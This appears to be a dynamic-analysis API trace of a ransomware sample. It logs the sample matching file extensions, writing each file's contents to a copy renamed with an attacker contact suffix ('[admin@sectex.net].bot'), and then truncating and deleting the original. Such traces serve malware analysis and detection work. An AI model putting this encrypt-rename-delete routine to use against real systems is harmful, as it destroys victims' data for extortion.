	[0052.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.058] lstrlenW (lpString=".doc") returned 4
	[0052.058] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".docx") returned 5
	[0052.059] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1
	[0052.059] lstrlenW (lpString=".pdf") returned 4
	[0052.059] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".xls") returned 4
	[0052.059] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".xlsx") returned 5
	[0052.059] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1
	[0052.059] lstrlenW (lpString=".ppt") returned 4
	[0052.059] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString=".zip") returned 4
	[0052.059] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.059] lstrlenW (lpString=".rar") returned 4
	[0052.059] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".bz2") returned 4
	[0052.059] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".7z") returned 3
	[0052.059] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString=".dbf") returned 4
	[0052.059] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString=".1cd") returned 4
	[0052.059] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString=".jpg") returned 4
	[0052.059] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.059] lstrlenW (lpString=".doc") returned 4
	[0052.059] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.059] lstrlenW (lpString=".docx") returned 5
	[0052.059] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1
	[0052.060] lstrlenW (lpString=".pdf") returned 4
	[0052.060] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString=".xls") returned 4
	[0052.060] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString=".xlsx") returned 5
	[0052.060] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1
	[0052.060] lstrlenW (lpString=".ppt") returned 4
	[0052.060] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.060] lstrlenW (lpString=".zip") returned 4
	[0052.060] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.060] lstrlenW (lpString=".rar") returned 4
	[0052.060] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString=".bz2") returned 4
	[0052.060] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString=".7z") returned 3
	[0052.060] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.060] lstrlenW (lpString=".dbf") returned 4
	[0052.060] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.060] lstrlenW (lpString=".1cd") returned 4
	[0052.060] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77
	[0052.060] lstrlenW (lpString=".jpg") returned 4
	[0052.060] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.060] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0052.060] lstrlenW (lpString="sql2000.xsl") returned 11
	[0052.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0052.275] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=34076) returned 1
	[0052.275] CloseHandle (hObject=0x1a0) returned 1
	[0052.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20
	[0052.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0052.275] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.275] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0052.276] GetLastError () returned 0x0
	[0052.276] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x851c, lpOverlapped=0x0) returned 1
	[0052.278] WriteFile (in: hFile=0x1cc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x8520, lpOverlapped=0x0) returned 1
	[0052.280] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.280] WriteFile (in: hFile=0x1cc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0052.280] SetEndOfFile (hFile=0x1cc) returned 1
	[0052.280] CloseHandle (hObject=0x1cc) returned 1
	[0052.280] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.280] SetEndOfFile (hFile=0x1a0) returned 1
	[0052.281] CloseHandle (hObject=0x1a0) returned 1
	[0052.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1
	[0052.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.282] lstrlenW (lpString=".doc") returned 4
	[0052.282] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString=".docx") returned 5
	[0052.282] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.282] lstrlenW (lpString=".pdf") returned 4
	[0052.282] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString=".xls") returned 4
	[0052.282] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString=".xlsx") returned 5
	[0052.282] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.282] lstrlenW (lpString=".ppt") returned 4
	[0052.282] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.282] lstrlenW (lpString=".zip") returned 4
	[0052.282] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.282] lstrlenW (lpString=".rar") returned 4
	[0052.282] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString=".bz2") returned 4
	[0052.282] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString=".7z") returned 3
	[0052.282] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.282] lstrlenW (lpString=".dbf") returned 4
	[0052.282] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.282] lstrlenW (lpString=".1cd") returned 4
	[0052.283] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString=".jpg") returned 4
	[0052.283] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString=".doc") returned 4
	[0052.283] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString=".docx") returned 5
	[0052.283] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.283] lstrlenW (lpString=".pdf") returned 4
	[0052.283] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString=".xls") returned 4
	[0052.283] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString=".xlsx") returned 5
	[0052.283] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.283] lstrlenW (lpString=".ppt") returned 4
	[0052.283] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString=".zip") returned 4
	[0052.283] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.283] lstrlenW (lpString=".rar") returned 4
	[0052.283] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString=".bz2") returned 4
	[0052.283] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString=".7z") returned 3
	[0052.283] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString=".dbf") returned 4
	[0052.283] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.283] lstrlenW (lpString=".1cd") returned 4
	[0052.283] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79
	[0052.284] lstrlenW (lpString=".jpg") returned 4
	[0052.284] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.284] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0052.284] lstrlenW (lpString="AG00037_.GIF") returned 12
	[0052.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0053.372] GetFileSizeEx (in: hFile=0x158, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=6684) returned 1
	[0053.372] CloseHandle (hObject=0x158) returned 1
	[0053.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 0x20
	[0053.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0053.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0053.400] GetLastError () returned 0x0
	[0053.400] ReadFile (in: hFile=0x158, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1a1c, lpOverlapped=0x0) returned 1
	[0053.407] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1a20, lpOverlapped=0x0) returned 1
	[0053.722] ReadFile (in: hFile=0x158, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.722] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.723] SetEndOfFile (hFile=0x1f8) returned 1
	[0054.769] CloseHandle (hObject=0x1f8) returned 1
	[0055.000] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.000] SetEndOfFile (hFile=0x158) returned 1
	[0055.102] CloseHandle (hObject=0x158) returned 1
	[0055.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1
	[0055.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".doc") returned 4
	[0055.122] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.122] lstrlenW (lpString=".docx") returned 5
	[0055.122] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.122] lstrlenW (lpString=".pdf") returned 4
	[0055.122] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString=".xls") returned 4
	[0055.122] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString=".xlsx") returned 5
	[0055.122] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.122] lstrlenW (lpString=".ppt") returned 4
	[0055.122] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".zip") returned 4
	[0055.122] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString=".rar") returned 4
	[0055.122] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString=".bz2") returned 4
	[0055.122] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.122] lstrlenW (lpString=".7z") returned 3
	[0055.122] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".dbf") returned 4
	[0055.122] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".1cd") returned 4
	[0055.122] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".jpg") returned 4
	[0055.122] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.122] lstrlenW (lpString=".doc") returned 4
	[0055.123] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.123] lstrlenW (lpString=".docx") returned 5
	[0055.123] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.123] lstrlenW (lpString=".pdf") returned 4
	[0055.123] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.123] lstrlenW (lpString=".xls") returned 4
	[0055.123] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.123] lstrlenW (lpString=".xlsx") returned 5
	[0055.123] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.123] lstrlenW (lpString=".ppt") returned 4
	[0055.123] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.123] lstrlenW (lpString=".zip") returned 4
	[0055.123] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.123] lstrlenW (lpString=".rar") returned 4
	[0055.123] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.123] lstrlenW (lpString=".bz2") returned 4
	[0055.123] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.123] lstrlenW (lpString=".7z") returned 3
	[0055.123] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.123] lstrlenW (lpString=".dbf") returned 4
	[0055.123] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.123] lstrlenW (lpString=".1cd") returned 4
	[0055.123] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63
	[0055.123] lstrlenW (lpString=".jpg") returned 4
	[0055.123] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.123] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.124] lstrlenW (lpString="AG00139_.GIF") returned 12
	[0055.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.802] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=10607) returned 1
	[0056.802] CloseHandle (hObject=0x1f8) returned 1
	[0056.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 0x20
	[0056.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.803] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.803] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238
	[0056.803] GetLastError () returned 0x0
	[0056.803] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x296f, lpOverlapped=0x0) returned 1
	[0056.805] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2970, lpOverlapped=0x0) returned 1
	[0056.806] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.806] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.806] SetEndOfFile (hFile=0x238) returned 1
	[0056.806] CloseHandle (hObject=0x238) returned 1
	[0056.806] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.806] SetEndOfFile (hFile=0x1f8) returned 1
	[0056.814] CloseHandle (hObject=0x1f8) returned 1
	[0056.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
